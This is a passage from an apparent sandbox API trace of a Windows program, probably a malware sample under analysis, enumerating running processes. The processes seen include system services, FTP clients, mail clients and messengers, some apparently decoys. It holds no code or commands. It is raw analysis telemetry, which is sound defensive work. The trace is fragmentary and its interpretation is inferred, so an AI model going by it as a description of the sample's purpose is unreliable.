th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0236.742] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0236.744] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0236.745] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0236.748] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.750] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.751] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.753] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.754] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0236.756] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.757] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0236.759] CloseHandle (hObject=0x1494) returned 1 [0236.759] Sleep (dwMilliseconds=0x64) [0237.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0237.067] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.069] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.070] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.072] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.073] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.076] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.078] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.079] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.081] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.082] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.083] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.085] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.086] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.088] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.091] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.092] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.094] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.095] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.097] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.098] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.100] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0237.101] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0237.103] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.104] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.173] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0237.177] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0237.178] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0237.180] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.181] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.182] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0237.184] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.186] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.187] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0237.189] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0237.190] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0237.191] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0237.193] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0237.194] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0237.196] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0237.197] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0237.198] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0237.204] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0237.205] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0237.207] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0237.208] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0237.209] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0237.211] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0237.212] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0237.213] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0237.262] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0237.266] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0237.268] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0237.269] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0237.271] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0237.272] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0237.274] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0237.275] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0237.277] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0237.333] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0237.335] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0237.336] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0237.338] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0237.343] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0237.345] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0237.347] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0237.348] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0237.350] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0237.352] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0237.353] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0237.355] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0237.384] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0237.386] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0237.388] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: 